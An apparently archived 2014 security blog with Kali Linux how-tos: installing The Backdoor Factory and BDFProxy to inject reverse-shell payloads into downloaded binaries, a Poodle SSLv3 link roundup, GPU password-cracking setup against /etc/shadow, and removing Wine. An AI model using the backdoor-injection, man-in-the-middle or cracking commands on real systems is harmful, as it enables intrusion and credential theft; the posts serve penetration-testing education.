Tuesday, October 28, 2014

Do Not Trust Your Download Even It Is From The Trusted Source

Joshua Pitts developed a tool suite for injecting backdoor to executable files of Windows, Linux and Mac OSX as well as FreeBSD. The process is fully automatically even you do not know what code cave is.

The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.

Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.





How to install BDFactory on Kali Linux 1.0.9a?

BDFactory is working very well with Metasploit Framework.

apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove

apt-get install python-pip


Install BDFactory :

cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.sh


To update :
./update.sh

Install BDFProxy :

cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.sh


To update :
./update.sh

Usage of BDFactory :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp


Usage of BDFProxy :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc

*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment

Conclusion

Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.

Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.

REFERENCE

Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing

That's all! See you.

Thursday, October 16, 2014

VULNERABLE : Poodle SSLv3 Vulnerability

What is Poodle Vulnerability?

Google researchers have discovered a security vulnerability in SSL 3.0 that allows attackers to decrypt encrypted website connections. The details is in here.

However, some security experts disagree that the bug is particularly serious and they think that it only affect the public wifi.

How to exploit it?

Daniel Fox Franke wrote in his blog to explain how to exploit the vulnerability.

How to test the browsers vulnerability?

Qualys provides a tester online for the browsers testing. Or, you can try another tester online.

How to test the server vulnerability?

Qualys provides server test online for the server testing.

How to fix the browsers vulnerability?

There is a tutorial to show you how to fix them.

How to fix the common servers vulnerability?

There is a tutorial to show to you how to fix the vulnerability on common servers.

That's all! See you.

Thursday, October 02, 2014

HOWTO : CUDA with Kali Linux 1.0.9

The guide has been updated on FEB 4, 2015 as Kali Linux 1.0.9a includes the nVidia driver 340.x and CUDA 5.5.x.

Hardware

CPU : Intel i7-3930K
RAM : 32GB DDR3
Hard Drive : 3TB
Display Card : Two nVidia GeForce GTX 590

Install Kali

Install Kali Linux 1.0.9 on the box as usual. Make sure "secure boot" is disabled in your BIOS before installing. After that, you update the Kali accordingly.

apt-get update
apt-get dist-upgrade


Install nVidia Driver

apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms nvidia-driver nvidia-cuda-toolkit nvidia-xconfig

nvidia-xconfig

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Fix the nvidia_uvm error

After the reboot :

cd /usr/src/nvidia-current-331.67
make

cp Module.symvers uvm/
make -C uvm

cp uvm/nvidia-uvm.ko /lib/modules/`uname -r`/updates/dkms


Updated on Jan 8, 2015

Remark : If you use backports version, the nvidia_uvm problem is fixed and the cudaHashcat 1.31 can be running without any problem. The backports version of nVidia driver is 340.65 and the version of CUDA driver is 5.5.22 at this time of writing.

echo "deb http://ftp.debian.org/debian wheezy-backports main contrib non-free" >> /etc/apt/sources.list

apt-get update

apt-get install -t wheezy-backports nvidia-kernel-dkms nvidia-cuda-toolkit nvidia-driver nvidia-xconfig

If you have done the following steps, you are not required to re-do it again.

nvidia-xconfig

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Install cudaHashcat

mkdir hacking
cd hacking

wget http://hashcat.net/files/cudaHashcat-1.30.7z

7za x cudaHashcat-1.30.7z


wget http://hashcat.net/files-legacy/cudaHashcat-1.31.7z

7za x cudaHashcat-1.31.7z


(Please noted that the current version 1.32 does not compatible to nVidia driver 340.x).

Test the cudaHashcat

cd /root/hacking/cudaHashcat-1.30/
./cudaExample0.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample400.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample500.sh


Install John the Ripper

(Please note that the current version of john is john-1.80-jumbo-1.tar.gz)

apt-get install libssl-dev

cd hacking

wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src

./configure
make
make clean linux-x86-64-cuda


** If your hashes or passwords are longer than 8 characters, you need to change the following before compiling the John.

cd john-1.7.9-jumbo-7/src
nano params.h


Then change from "8" to "18" or "20" and etc.

#define CHARSET_LENGTH 8

Test the John the Ripper

cd /root/hacking/john-1.7.9-jumbo-7/run

./john --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow


* since I have 4 GPUs, so the --device should be 4.

*** When you changed the CHARSET_LENGTH, you need to generate a new charset. Do it once only.

wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 -d rockyou.txt.bz2
cp rockyou.txt /root/hacking/john-1.7.9-jumbo-7/run

cd /root/hacking/john-1.7.9-jumbo-7/run

cat rockyou.txt | sed 's/^/:/' > rockyou.pot

mv all.chr all.chr-original
mv alnum.chr alnum.chr-original
mv alpha.chr alpha.chr-original
mv digits.chr digits.chr-original
mv lanman.chr lanman.chr-original

./john --pot=rockyou.pot --make-charset=all.chr
./john --pot=rockyou.pot --make-charset=alnum.chr --external=filter_alnum
./john --pot=rockyou.pot --make-charset=alpha.chr --external=filter_alpha
./john --pot=rockyou.pot --make-charset=digits.chr --external=filter_digits
./john --pot=rockyou.pot --make-charset=lanman.chr --external=filter_lanman


Then your cracking command will be :

./john --pot=rockyou.pot --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow

Install and Test Cryptohaze

cd hacking
wget http://sourceforge.net/projects/cryptohaze/files/Cryptohaze-Linux_x64_1_31a.tar.bz2/download -O Cryptohaze-Linux_x64_1_31a.tar.bz2

tar xjvf Cryptohaze-Linux_x64_1_31a.tar.bz2

cd /root/hacking/Cryptohaze-Linux
./Cryptohaze-Multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt


That's all! See you.

Wednesday, October 01, 2014

HOWTO : Uninstall a specific software/package in Kali Linux 1.0.9

Since I need to run Ollydbg for a while, I then installed Wine in Kali Linux. When I no longer require Ollydbg, I would like to uninstall Wine. However, there are a lot of dependencies for the Wine. When you uninstall Wine with the following command, you will uninstall a lot of software or packages that may be useful for you, such as Gnome.

apt-get --purge remove wine

A more safety way to uninstall Wine should be as the following :

dpkg --remove --force-depends wine-bin
dpkg --remove --force-depends wine


That's all! See you.